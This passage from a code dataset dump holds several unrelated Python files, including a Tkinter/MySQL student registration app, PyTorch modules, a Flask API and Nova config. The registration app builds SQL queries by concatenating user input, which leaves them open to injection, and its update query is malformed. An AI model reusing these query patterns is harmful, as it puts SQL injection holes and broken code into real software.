#if the word doesn't 
contain a sentence terminator, keep adding to the sentence\r\n if('.' not in i and '?' not in i and '!' not in i):\r\n sentence = sentence + i + \" \"\r\n #if it contains a terminator, check if the next word is capitalized. If it is, start a new sentence. If not, don't end the sentence\r\n elif('?' in i or '!' in i):\r\n index = words.index(i)\r\n next = words[index+1]\r\n if(next[1].isupper()):\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n else:\r\n sentence = sentence + i + \" \"\r\n #if the word contains a period, check if it's an abbreviation\r\n elif('.' in i):\r\n # print(i)\r\n if(i.lower() in abbreviations):\r\n sentence = sentence + i + \" \"\r\n #check if the next word is capitalized\r\n else:\r\n index = words.index(i)\r\n next = words[index+1]\r\n if(next[0].isupper()):\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n else:\r\n sentence = sentence + i + \" \"\r\n #the else is for words that don't contain the end of a quotation \r\n else:\r\n if('.' not in i and '?' not in i and '!' not in i):\r\n sentence = sentence + i + \" \"\r\n elif('?' in i or '!' in i):\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n else:\r\n #check if the word is in the list of common abbreviations. If it is, don't end the sentence.\r\n if(i.lower() in abbreviations):\r\n sentence = sentence + i + \" \"\r\n #if the last character isn't a period, it is probably a number or abbreviation, so don't end the sentence\r\n elif(i[-1] != '.'):\r\n sentence = sentence + i + \" \"\r\n #otherwise, end the sentence and start a new one\r\n else:\r\n sentence = sentence + i\r\n sentenceList.append(sentence)\r\n sentence = \"\"\r\n \r\n#create new file to write the output to\r\noutputFile= open(\"output.txt\",\"w+\")\r\n\r\n\r\n#call the function\r\nsegmentSentences(data)\r\n\r\n#write the segmented sentences to output.txt\r\nfor i in sentenceList:\r\n #some sentences have extra space at the front due to replacing new line with a space. 
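# Note on segmentSentences() above: both look-ahead branches use
# words.index(i), which returns the FIRST occurrence of the token, so a
# repeated word peeks at the wrong neighbour; it also raises IndexError when
# the terminator is the last token. Carrying the position with enumerate()
# sidesteps both. Hedged sketch:
def peek_next(words, idx):
    """Token after position idx, or None at the end of input."""
    return words[idx + 1] if idx + 1 < len(words) else None

# for idx, word in enumerate(words):
#     nxt = peek_next(words, idx)   # instead of words[words.index(word) + 1]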
This checks for that and removes the extra space if it exists.\r\n if(i[0] == \" \"):\r\n outputFile.write(str(sentenceNum) + \": \" + i[1:] + '\\n')\r\n else:\r\n outputFile.write(str(sentenceNum) + \": \" + i + '\\n')\r\n sentenceNum += 1","repo_name":"jwedwar1/Natural-Language-Processing","sub_path":"Sentence Segmenter/Sentence Segmenter.py","file_name":"Sentence Segmenter.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6774128583","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\n\nfrom .blocks import get_sinusoid_encoding, TransformerEncoderBlock, LayerNorm\nfrom .resnet import resnet8_cifar, resnet10_imagenet\n\n\nclass BranchEncoder(nn.Module):\n \"\"\"\n A backbone with a stack of transformer encoder layers.\n \n learned knob embeddings\n -> [embedding projection] \n -> [self-attn transformer x L]\n -> branch embeddings\n \"\"\"\n def __init__(\n self, \n embd_dim, # embedding dimension\n out_dim, # output dimension\n seq_len, # input sequence length\n n_heads, # number of attention heads\n n_layers=5, # number of transformer encoder layers\n attn_pdrop=0.1, # dropout rate for attention map\n proj_pdrop=0.1, # dropout rate for projection\n path_pdrop=0.1, # dropout rate for residual paths\n eos=True, # if True, add end-of-sequence token.\n embd_type=0, # knob embedding type (0, 1)\n pe_type=0, # position encoding type (-1, 0, 1)\n # -1: none\n # 0: transformer-style\n # 1: perceiver-style\n ):\n super(BranchEncoder, self).__init__()\n\n self.seq_len = seq_len\n\n # learned knob encodings\n ## NOTE: include a [EOS] token to encode hidden state\n assert embd_type in (0, 1)\n self.embd_type = embd_type\n self.eos = eos\n if embd_type == 0:\n self.ke = nn.Embedding(seq_len + eos, embd_dim)\n self.be = nn.Embedding(2, embd_dim)\n else:\n self.ke = nn.Embedding(seq_len * 2 + eos, embd_dim)\n\n # position encodings (t+1, c)\n assert pe_type in (-1, 0, 1)\n self.pe_type = pe_type\n if pe_type in (0, 1):\n pe = get_sinusoid_encoding(seq_len + eos, embd_dim // 2, pe_type)\n pe /= embd_dim ** 0.5\n self.register_buffer('pe', pe, persistent=False)\n\n # self-attention transformers\n self.transformer = nn.ModuleList()\n for _ in range(n_layers):\n self.transformer.append(\n TransformerEncoderBlock(\n embd_dim, \n n_heads=n_heads, \n attn_pdrop=attn_pdrop, \n proj_pdrop=proj_pdrop, \n path_pdrop=path_pdrop,\n )\n )\n\n # hidden state projection\n self.fc = nn.Linear(embd_dim, out_dim)\n \n self.apply(self.__init_weights__)\n\n def __init_weights__(self, module):\n if isinstance(module, (nn.Linear, nn.Conv1d)):\n if module.bias is not None:\n nn.init.zeros_(module.bias)\n elif isinstance(module, nn.Embedding):\n nn.init.normal_(module.weight, std=0.01)\n\n def forward(self, masks):\n \"\"\"\n Args:\n masks (bool tensor, (n, kb)): branch masks.\n\n Returns:\n x (float tensor, (n, c)): branch embeddings.\n \"\"\"\n bs, t = masks.size()\n assert t == self.seq_len\n\n # add knob, binary and position encodings\n if self.embd_type == 0:\n x = self.ke.weight.transpose(0, 1) # (c, t+1)\n if self.pe_type in (0, 1):\n x = x + self.pe # (c, t+1)\n be = self.be(masks.int()).transpose(1, 2) # (n, c, t)\n x = x.repeat(bs, 1, 1) # (n, c, t+1)\n if self.eos:\n x[..., :-1] = x[..., :-1] + be\n else:\n x = x + be\n else:\n ke_idx = torch.arange(\n self.seq_len, device=masks.device\n ) * 2 + masks # (n, kb)\n if self.eos:\n ke_idx = torch.cat(\n [ke_idx, self.ke.num_embeddings * 
ke_idx.new_ones(bs, 1)], \n dim=1,\n )\n x = self.ke(ke_idx).transpose(1, 2) # (n, c, t)\n if self.pe_type in (0, 1):\n x = x + self.pe\n\n # self-attention transformers\n for idx in range(len(self.transformer)):\n x = self.transformer[idx](x)\n\n # hidden state projection\n if self.eos:\n x = x[..., -1]\n else:\n x = x.mean(dim=-1)\n x = self.fc(x) # (n, c) # c: out_dim: 128 in res18_cifar10\n return x\n\n\nclass ContentEncoder(nn.Module):\n\n def __init__(self, out_dim, arch='mobilenet_v2', pretrained=False):\n super(ContentEncoder, self).__init__()\n\n ## NOTE: all GFLOPs assume 224x224 input\n if arch == 'mobilenet_v2': # 0.3 GFLOPs\n model = models.mobilenet_v2(pretrained).features\n embd_dim = 1280\n elif arch == 'mobilenet_v3_large': # 0.219 GFLOPs\n model = models.mobilenet_v3_large(pretrained).features\n embd_dim = 960\n elif arch == 'mobilenet_v3_small': # 0.056 GFLOPs\n model = models.mobilenet_v3_small(pretrained).features\n embd_dim = 576\n elif arch == 'efficientnet_b0': # 0.39 GFLOPs\n model = models.efficientnet_b0(pretrained).features\n embd_dim = 1280\n elif arch == 'efficientnet_b1': # 0.70 GFLOPs\n model = models.efficientnet_b1(pretrained).features\n embd_dim = 1280\n elif arch == 'efficientnet_b2': # 1.0 GFLOPs\n model = models.efficientnet_b2(pretrained).features\n embd_dim = 1408\n elif arch == 'efficientnet_b3': # 1.8 GFLOPs\n model = models.efficientnet_b3(pretrained).features\n embd_dim = 1536\n elif arch == 'resnet8_cifar':\n model = resnet8_cifar()\n embd_dim = 64\n elif arch == 'resnet10_imagenet':\n model = resnet10_imagenet()\n embd_dim = 512\n else:\n raise NotImplementedError(\n 'invalid content encoder architecture: {:s}'.format(arch)\n )\n\n self.model = model\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(embd_dim, out_dim)\n\n def forward(self, x):\n x = self.model(x)\n x = self.avgpool(x).flatten(1)\n x = self.fc(x)\n return x\n\n\nclass BranchVAE(nn.Module):\n \"\"\"\n A variational autoencoder for branch sampling at inference time.\n \"\"\"\n def __init__(self, in_dim, hid_dim, n_layers, latent_dim):\n super(BranchVAE, self).__init__()\n\n self.in_dim = in_dim\n self.latent_dim = latent_dim\n\n # encoder\n ## NOTE: output is Gaussian mean and log variance\n enc = []\n for _ in range(n_layers - 1):\n enc.append(\n nn.Sequential(\n nn.Linear(in_dim, hid_dim), \n nn.ReLU(inplace=True),\n )\n )\n in_dim = hid_dim\n enc.append(nn.Linear(in_dim, latent_dim * 2))\n self.enc = nn.Sequential(*enc)\n\n # decoder\n ## NOTE: output is Bernoulli mean\n dec = []\n for _ in range(n_layers - 1):\n dec.append(\n nn.Sequential(\n nn.Linear(latent_dim, hid_dim), \n nn.ReLU(inplace=True),\n )\n )\n latent_dim = hid_dim\n dec.append(nn.Linear(latent_dim, self.in_dim))\n self.dec = nn.Sequential(*dec)\n\n def _encode(self, x):\n x = self.enc(x)\n mu, log_var = x.split(self.latent_dim, dim=1)\n return mu, log_var\n\n def _sample(self, mu, log_var):\n sigma = torch.exp(0.5 * log_var)\n z = torch.randn_like(sigma) * sigma + mu\n return z\n\n def _decode(self, z):\n x = self.dec(z)\n return x\n\n def forward(self, x=None, z=None):\n # train\n if x is not None and z is None:\n mu, log_var = self._encode(x.float())\n z = self._sample(mu, log_var)\n logits = self._decode(z)\n return logits, mu, log_var\n # test\n elif x is None and z is not None:\n p = torch.sigmoid(self._decode(z))\n return p\n else:\n raise ValueError('one of x and z must be 
given')","repo_name":"OliverXUZY/adaptive_inference","sub_path":"libs/model/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4958335637","text":"from datetime import *\n\ndef gun_to_tarih(yil, gun):\n # Verilen yılın 1 Ocak tarihini oluşturun\n tarih = datetime(yil, 1, 1)\n \n # Verilen gün sayısı kadar gün ekleyin (gun - 1 çünkü günler 0'dan başlar)\n tarih += timedelta(days=gun - 1)\n\n return tarih\n\nstart = int(input(\"What's your starting minute: \"))\n\nstart_day = date.today()\n\nday_of_year = start_day.strftime(\"%j\")\n\nk = 0\n\nfor i in range(int(day_of_year),366):\n k += 1\n with open('E:/www/python/basic-projects/Habit Generator/habit.txt', 'a') as file:\n file.write(f\"{gun_to_tarih(datetime.now().year, i).strftime('%d/%m/%Y')} - Starting day is {k} - Working minute {round(start,2)}\\n\")\n\n start = start + ((start / 100) * 1)","repo_name":"Bahrilangelo/Basic-Projects","sub_path":"Habit Generator/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22259102823","text":"from flask import Flask, jsonify, request\r\nimport math\r\napp= Flask(__name__)\r\n\r\n@app.route(\"/nombre\", methods=[\"POST\"])\r\ndef setName():\r\n if request.method=='POST':\r\n dato_posteado = request.get_json()\r\n dato = dato_posteado['dato']\r\n return jsonify(str(\"Almacenado correctamente \" + str(dato)))\r\n \r\n@app.route(\"/mensaje\", methods=[\"GET\"])\r\ndef message():\r\n dato_posteado = request.get_json()\r\n nombre = dato_posteado['nombre']\r\n return jsonify(\"Saludos cordiales, \" + nombre)\r\n\r\n@app.route(\"/raices\", methods=[\"GET\"])\r\ndef calcularRaices():\r\n # Obtén los valores a, b y c de la URL\r\n coefa = float(request.args.get(\"a\"))\r\n coefb = float(request.args.get(\"b\"))\r\n coefc = float(request.args.get(\"c\"))\r\n\r\n # Calcula las raíces de la ecuación cuadrática\r\n discriminante = coefb**2 - 4*coefa*coefc\r\n if discriminante > 0:\r\n x1 = (-coefb + math.sqrt(discriminante)) / (2*coefa)\r\n x2 = (-coefb - math.sqrt(discriminante)) / (2*coefa)\r\n return jsonify({\"raices\": [x1, x2]})\r\n elif discriminante == 0:\r\n x = -coefb / (2*coefa)\r\n return jsonify({\"raices\": [x]})\r\n else:\r\n return jsonify({\"raices\": []}) # No hay raíces reales\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"EduardoFloresR/Flask_API_Implementation","sub_path":"P2.py","file_name":"P2.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70438623511","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport pymysql\n\n\nroot = Tk()\n\nroot.title(\"STUDENT REG\")\nroot.geometry('1417x720')\nroot.resizable(False, False)\nmy_tree = ttk.Treeview(root)\n\nbg = PhotoImage(file=\"./banner.png\")\n\nbg_label = Label(root, image=bg)\nbg_label.place(x=0, y=0)\n\nicon = Image.open(\"./icon.jpg\")\n\n#resize\nresized = icon.resize((420,550), Image.ANTIALIAS)\n\n#call\nnew_icon = ImageTk.PhotoImage(resized)\n\n\nicon = ImageTk.PhotoImage(Image.open(\"./icon.jpg\"))\nicon_label = Label(image=new_icon)\nicon_label.place(x=1, y=183)\n\nph1 = tk.StringVar()\nph2 = tk.StringVar()\nph3 = tk.StringVar()\nph4 = 
tk.StringVar()\nph5 = tk.StringVar()\nph6 = tk.StringVar()\nph7 = tk.StringVar()\nph8 = tk.StringVar()\nph9 = tk.StringVar()\n\n\ndef setph(word,num):\n if num == 1:\n ph1.set(word)\n if num == 2:\n ph2.set(word)\n if num == 3:\n ph3.set(word)\n if num == 4:\n ph4.set(word)\n if num == 5:\n ph5.set(word)\n if num == 6:\n ph6.set(word)\n if num == 7:\n ph7.set(word)\n if num == 8:\n ph8.set(word)\n if num == 9:\n ph9.set(word)\n\n\ndef connection():\n conn =pymysql.connect(\n host = 'localhost', user = 'root', password ='', db = 'personal_infos_db')\n return conn\n\ndef refreshTable():\n for i in my_tree.get_children():\n my_tree.delete(i)\n\n for array in read():\n my_tree.insert(parent='', index='end', iid=array,text=\"\", values=(array), tags=\"orow\")\n \n my_tree.tag_configure('orow', background=\"#EEEEEE\", font=('Verdana', 10))\n my_tree.place(x=430, y=400)\n\n\ndef read():\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM cs_students\")\n results = cursor.fetchall()\n conn.commit()\n conn.close()\n return results\n\n\ndef register():\n stud_num = str(stud_numEntry.get())\n l_name = str(l_nameEntry.get())\n f_name = str(f_nameEntry.get())\n birth = str(birthEntry.get())\n address = str(addressEntry.get())\n phone = str(phoneEntry.get())\n dept = str(track.get())\n course = str(n2.get())\n year = str(n3.get())\n\n if(stud_num == \"\" or stud_num == \" \") or (l_name == \"\" or l_name == \" \") or (f_name == \"\" or f_name == \" \") or (birth == \"\" or birth == \" \") or (address == \"\" or address == \" \") or (phone == \"\" or phone == \" \") or (dept == \"\" or dept == \" \") or (course == \"\" or course == \" \") or (year == \"\" or year == \" \"):\n messagebox.showinfo(\"Error\", \"Please Fill up all the fields\")\n return\n else:\n try:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"INSERT INTO cs_students VALUES('\"+stud_num+\"','\"+l_name+\"','\"+f_name+\"','\"+birth+\"','\"+address+\"','\"+phone+\"','\"+dept+\"','\"+course+\"','\"+year+\"')\")\n conn.commit()\n conn.close()\n except:\n messagebox.showinfo(\"Error\", \"Student ID already Exists\")\n return\n stud_numEntry.delete(0, 'end')\n l_nameEntry.delete(0, 'end')\n f_nameEntry.delete(0, 'end')\n birthEntry.delete(0, 'end')\n addressEntry.delete(0, 'end')\n phoneEntry.delete(0, 'end')\n track.delete(0, 'end')\n n2.set(\"SELECTED COURSE\")\n n3.set(\"YEAR\")\n\n refreshTable()\n\ndef reset():\n desicion = messagebox.askquestion(\"Warning!\", \"Reset All Data?\")\n if desicion != \"yes\":\n return\n else:\n try:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM cs_students\")\n conn.commit()\n conn.close()\n except:\n messagebox.showinfo(\"Error\", \"Sorry an Error occured\")\n return\n refreshTable()\n\ndef delete():\n desicion = messagebox.askquestion(\"Deleting Data!\", \"Delete the data?\")\n if desicion != \"yes\":\n return\n else:\n selected_item = my_tree.selection()[0]\n deleteData = str(my_tree.item(selected_item)['values'][0])\n try:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM cs_students WHERE stud_num= '\"+str(deleteData)+\"'\")\n conn.commit()\n conn.close()\n except:\n messagebox.showinfo(\"Error\", \"Sorry an Error occured\")\n return\n \n refreshTable()\n\ndef update():\n selectedStudid = \"\"\n try:\n selected_item = my_tree.selection()[0]\n stud_num = str(my_tree.item(selected_item)['values'][0])\n l_name = str(my_tree.item(selected_item)['values'][1])\n f_name = 
str(my_tree.item(selected_item)['values'][2])\n birth = str(my_tree.item(selected_item)['values'][3])\n address = str(my_tree.item(selected_item)['values'][4])\n phone = str(my_tree.item(selected_item)['values'][5])\n dept = str(my_tree.item(selected_item)['values'][6])\n course = str(my_tree.item(selected_item)['values'][7])\n year = str(my_tree.item(selected_item)['values'][8])\n\n setph(stud_num, 1)\n setph(l_name, 2)\n setph(f_name, 3)\n setph(birth, 4)\n setph(address, 5)\n setph(phone, 6)\n setph(dept, 7)\n setph(course, 8)\n setph(year, 9)\n\n except:\n messagebox.showinfo(\"Error\", \"Sorry an Error occured\")\n\n stud_num = str(stud_numEntry.get())\n l_name = str(l_nameEntry.get())\n f_name = str(f_nameEntry.get())\n birth = str(birthEntry.get())\n address = str(addressEntry.get())\n phone = str(phoneEntry.get())\n dept = str(track.get())\n course = str(n2.get())\n year = str(n3.get())\n\n if(stud_num == \"\" or stud_num == \" \") or (l_name == \"\" or l_name == \" \") or (f_name == \"\" or f_name == \" \") or (birth == \"\" or birth == \" \") or (address == \"\" or address == \" \") or (phone == \"\" or phone == \" \") or (dept == \"\" or dept == \" \") or (course == \"\" or course == \" \") or (year == \"\" or year == \" \"):\n messagebox.showinfo(\"Error\", \"Please Fill up all the fields\")\n return\n else:\n conn = connection()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE cs_students SET STUDID ='\"+stud_num+\"',LNAME = '\"+l_name+\"',FNAME = '\"+f_name+\"',BIRTH = '\"+birth+\"',ADDRESS = '\"+address+\"',PHONE = '\"+phone+\"',DEPT = '\"+dept+\"',COURSE = '\"+course+\"',YEAR = '\"+year+\"' WHERE STUDID = '\"+selectedStudid+ \"' '\")\n stud_numEntry.delete(0, 'end')\n l_nameEntry.delete(0, 'end')\n f_nameEntry.delete(0, 'end')\n birthEntry.delete(0, 'end')\n addressEntry.delete(0, 'end')\n phoneEntry.delete(0, 'end')\n track.delete(0, 'end')\n n2.set(\"SELECTED COURSE\")\n n3.set(\"YEAR\")\n conn.commit()\n conn.close()\n refreshTable()\n\n\nlabel2 = tk.Label(root, text=\"ISU Student Registration\", font=('Verdana', 20, 'bold'))\nlabel2.place(x=750,y=190)\n\nLabel(root, text=\"Student ID: \", font=('Verdana', 13)).place(x=430, y=250)\n\nstud_numEntry = Entry(root, width=15, bd=2, font=('Verdana', 13), textvariable=ph1)\nstud_numEntry.place(x=550, y=252, height = 25)\n\nLabel(root, text=\"Last Name: \", font=('Verdana', 13)).place(x=730, y=250)\n\nl_nameEntry = Entry(root, width=20, bd=2, font=('Verdana', 13), textvariable=ph2)\nl_nameEntry.place(x=850, y=252, height = 25)\n\nLabel(root, text=\"First Name: \", font=('Verdana', 13)).place(x=1080, y=250)\n\nf_nameEntry = Entry(root, width=17, bd=2, font=('Verdana', 13), textvariable=ph3)\nf_nameEntry.place(x=1200, y=252, height = 25)\n\nLabel(root, text=\"Birthday: \", font=('Verdana', 13)).place(x=430, y=300)\n\nbirthEntry = Entry(root, width=15, bd=2, font=('Verdana', 13), textvariable=ph4)\nbirthEntry.place(x=550, y=300, height = 25)\n#birthEntry.insert(0, \"MM/DD/YY\")\n\nLabel(root, text=\"Address: \", font=('Verdana', 13)).place(x=730, y=300)\n\naddressEntry = Entry(root, width=20, bd=2, font=('Verdana', 13), textvariable=ph5)\naddressEntry.place(x=850, y=302, height = 25)\n\nLabel(root, text=\"Phone: \", font=('Verdana', 13)).place(x=1100, y=300)\n\nphoneEntry = Entry(root, width=17, bd=2, font=('Verdana', 13), textvariable=ph6)\nphoneEntry.place(x=1200, y=302, height = 25)\n\nLabel(root, text=\"Track: \", font=('Verdana', 13)).place(x=430, y=350)\n\n#label3 = Label(root, text=\"Department\", font=('Verdana', 
13)).place(x=430, y=350)\n#stud_dep = ttk.Combobox(root,font=('Verdana', 8), state='readonly', value=[\"CCSICT\", \"EDUCATION\", \"CBM\", \"CJE\", \"SAS\"])\n#stud_dep.set(\" ---Select Department---\")\n#stud_dep.place(x=550, y=350, height = 27, width=169)\n\n#Label(root, text=\"Department: \", font=('Verdana', 13)).place(x=430, y=350)\n\n#deptEntry = Entry(root, width=15, bd=2, font=('Verdana', 13), textvariable=ph7)\n#deptEntry.place(x=550, y=350, height = 25)\nn = tk.StringVar()\ntrack = ttk.Combobox(root, width = 17,textvariable = n,font=('Verdana', 10, 'bold'))\ntrack.set(\"SELECTED TRACK\")\ntrack['values'] = ('DM - Data Mining Track', 'BA - Business Analytics Track')\ntrack['state'] = 'readonly'\ntrack.place(x=550, y=352, height=25)\n\nLabel(root, text=\"Course: \", font=('Verdana', 13)).place(x=730, y=350)\n#courseEntry = Entry(root, width=20, bd=2, font=('Verdana', 13), textvariable=ph8)\nn2 = tk.StringVar()\ncourse = ttk.Combobox(root, width = 17,textvariable = n2, font=('Verdana', 13, 'bold'))\ncourse.set(\"SELECTED COURSE\")\ncourse['values'] = ('BSCS', 'BSIT', 'BSPO', 'BPO', 'BSWD')\ncourse['state'] = 'readonly'\ncourse.place(x=850, y=350, height=25)\n\n#course = ttk.Combobox(root,font=('Verdana', 10), state='readonly', value=[\"1\", \"2\", \"3\", \"4\", \"5\"])\n#course.set(\" ---Select Course/Major--\")\n#courseEntry.place(x=850, y=350, height = 25, width=230)\n\nLabel(root, text=\"Year: \", font=('Verdana', 13)).place(x=1100, y=350)\nn3 = tk.StringVar()\nyear = ttk.Combobox(root, width=14, textvariable=n3, font=('Verdana', 13, 'bold'))\nyear.set(\"YEAR\")\nyear['values'] = ('1st year', '2nd year', '3rd year', '4th year')\nyear['state'] = 'readonly'\nyear.place(x=1200, y=350, height = 27)\n#yearEntry = Entry(root, width=17, bd=2, font=('Verdana', 13), textvariable=ph9)\n#yearEntry.place(x=1200, y=350, height = 27)\n\n\nButton(text=\"Register\", command=register, font=('Verdana', 20, 'bold'), width=10, height=1, bg='SpringGreen4').place(x=450, y=650)\n\nButton(text=\"Update\", command=update, font=('Verdana', 20, 'bold'), width=10, height=1, bg='SpringGreen4').place(x=700, y=650)\n\nButton(text=\"Delete\",command=delete, font=('Verdana', 20, 'bold'), width=10, height=1, bg='firebrick3').place(x=950, y=650)\n\nButton(text=\"Reset\", command=reset, font=('Verdana', 20, 'bold'), width=10, height=1, bg='firebrick3').place(x=1190, y=650)\n\n\n\nstyle = ttk.Style()\nstyle.configure(\"Treeview.Heading\", font=('Verdana', 9, 'bold'))\n\nmy_tree['columns'] = (\"Student ID\", \"Last Name\", \"First Name\", \"Birthday\", \"Address\", \"Phone\", \"Department\", \"Course\", \"Year\")\n\nmy_tree.column(\"#0\", width=0, stretch=NO)\nmy_tree.column(\"Student ID\", anchor=CENTER, width=85)\nmy_tree.column(\"Last Name\", anchor=CENTER, width=110)\nmy_tree.column(\"First Name\", anchor=CENTER, width=120)\nmy_tree.column(\"Birthday\", anchor=CENTER, width=100)\nmy_tree.column(\"Address\", anchor=CENTER, width=120)\nmy_tree.column(\"Phone\", anchor=CENTER, width=110)\nmy_tree.column(\"Department\", anchor=CENTER, width=120)\nmy_tree.column(\"Course\", anchor=CENTER, width=130)\nmy_tree.column(\"Year\", anchor=CENTER, width=70)\n\nmy_tree.heading(\"Student ID\", text=\"Student ID\", anchor=CENTER)\nmy_tree.heading(\"Last Name\", text=\"Last Name\", anchor=CENTER)\nmy_tree.heading(\"First Name\", text=\"First Name\", anchor=CENTER)\nmy_tree.heading(\"Birthday\", text=\"Birthday\", anchor=CENTER)\nmy_tree.heading(\"Address\", text=\"Address\", anchor=CENTER)\nmy_tree.heading(\"Phone\", text=\"Phone 
Number\", anchor=CENTER)\nmy_tree.heading(\"Department\", text=\"Department\", anchor=CENTER)\nmy_tree.heading(\"Course\", text=\"Course\", anchor=CENTER)\nmy_tree.heading(\"Year\", text=\"Year\", anchor=CENTER)\n\n\n\n\n\nroot.bind('', register)\nroot.bind('', delete)\nrefreshTable()\nroot.mainloop()","repo_name":"donForProjects/Student-Login-System","sub_path":"reg.py","file_name":"reg.py","file_ext":"py","file_size_in_byte":11879,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"3536756631","text":"# Import necessary modules and libraries\nimport RPi.GPIO as GPIO\nimport speech_recognition as sr \nimport spi_communication as spi\nimport time\n\n# Define the GPIO pin for the push button\nBUTTON_GPIO = 16 \n\n# Initialize the Speech Recognition module\nr = sr.Recognizer()\nmic = sr.Microphone()\n\n# Function to recognize speech using the microphone\ndef recognize_speech():\n with mic as source:\n try:\n # Listen for audio input and recognize it using Google's speech recognition\n audio = r.listen(source, timeout = 5.0)\n words = r.recognize_google(audio)\n print(words)\n return words\n except:\n print(\"No Answer\")\n return None\n\nif __name__== '__main__':\n # Set the GPIO mode and configure the push button pin\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(BUTTON_GPIO, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n# Main loop \nwhile True:\n if not GPIO.input(BUTTON_GPIO):\n print(\"Start Talking\")\n words = recognize_speech() # Start listening for speech \n else:\n words = None\n \n # If speech is recognized, send the corresponding SPI command\n if words != None:\n if words == \"open system\":\n spi.send_spi_command(0x5)\n elif words == \"shut down system\":\n spi.send_spi_command(0x6)\n elif words == \"AC open\":\n spi.send_spi_command(0x4)\n elif words == \"AC stop\":\n spi.send_spi_command(0x1)\n elif words == \"motor open\":\n spi.send_spi_command(0x2)\n elif words == \"motor stop\":\n spi.send_spi_command(0x3)\n else:\n print(\"Wrong input try again\")\n \n # End of the code","repo_name":"MostafaIibrahim/V2C_Project_Based_ADAS_ITI_GP","sub_path":"voice recognition version2/SPI_RAS/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73180307671","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom keystoneauth1 import loading as ks_loading\nfrom oslo_config import cfg\n\nfrom nova.conf import utils as confutils\n\n\nDEFAULT_SERVICE_TYPE = 'placement'\n\nplacement_group = cfg.OptGroup(\n 'placement',\n title='Placement Service Options',\n help=\"Configuration options for connecting to the placement API service\")\n\nplacement_opts = [\n cfg.StrOpt(\n 'os_region_name',\n deprecated_for_removal=True,\n deprecated_since='17.0.0',\n deprecated_reason='Endpoint lookup uses the service catalog via '\n 'common keystoneauth1 Adapter configuration '\n 'options. 
Use the region_name option instead.',\n help=\"\"\"\nRegion name of this node. This is used when picking the URL in the service\ncatalog.\n\nPossible values:\n\n* Any string representing region name\n\"\"\"),\n cfg.StrOpt(\n 'os_interface',\n deprecated_for_removal=True,\n deprecated_since='17.0.0',\n deprecated_reason='Endpoint lookup uses the service catalog via '\n 'common keystoneauth1 Adapter configuration '\n 'options. Use the valid_interfaces option instead.',\n help=\"\"\"\nEndpoint interface for this node. This is used when picking the URL in the\nservice catalog.\n\"\"\"),\n cfg.BoolOpt('randomize_allocation_candidates',\n default=False,\n help=\"\"\"\nIf True, when limiting allocation candidate results, the results will be\na random sampling of the full result set. If False, allocation candidates\nare returned in a deterministic but undefined order. That is, all things\nbeing equal, two requests for allocation candidates will return the same\nresults in the same order; but no guarantees are made as to how that order\nis determined.\n\"\"\"),\n]\n\ndeprecated_opts = {\n 'region_name': [cfg.DeprecatedOpt('os_region_name',\n group=placement_group.name)],\n 'valid_interfaces': [cfg.DeprecatedOpt('os_interface',\n group=placement_group.name)]\n}\n\n\ndef register_opts(conf):\n conf.register_group(placement_group)\n conf.register_opts(placement_opts, group=placement_group)\n confutils.register_ksa_opts(conf, placement_group, DEFAULT_SERVICE_TYPE,\n deprecated_opts=deprecated_opts)\n\n\ndef list_opts():\n return {\n placement_group.name: (\n placement_opts +\n ks_loading.get_session_conf_options() +\n ks_loading.get_auth_common_conf_options() +\n ks_loading.get_auth_plugin_conf_options('password') +\n ks_loading.get_auth_plugin_conf_options('v2password') +\n ks_loading.get_auth_plugin_conf_options('v3password') +\n confutils.get_ksa_adapter_opts(DEFAULT_SERVICE_TYPE,\n deprecated_opts=deprecated_opts))\n }\n","repo_name":"bopopescu/Cloud-User-Management","sub_path":"kolla-docker/nova/nova/conf/placement.py","file_name":"placement.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24329703424","text":"a=5;\nb=6;\n\nprint(int.__add__(a,b));\n\nclass Student:\n def __init__(self,n1,n2):\n self.n1=n1;\n self.n2=n2;\n def __add__(self, other):\n n1=self.n1+other.n1;\n n2=self.n2+other.n2;\n s3=Student(n1,n2);\n return s3;\n\n def __gt__(self, other):\n m1=self.n1+self.n2;\n m2=other.n1+other.n2;\n if m1>m2:\n return True\n else:\n return False\n def __str__(self):\n return '{} 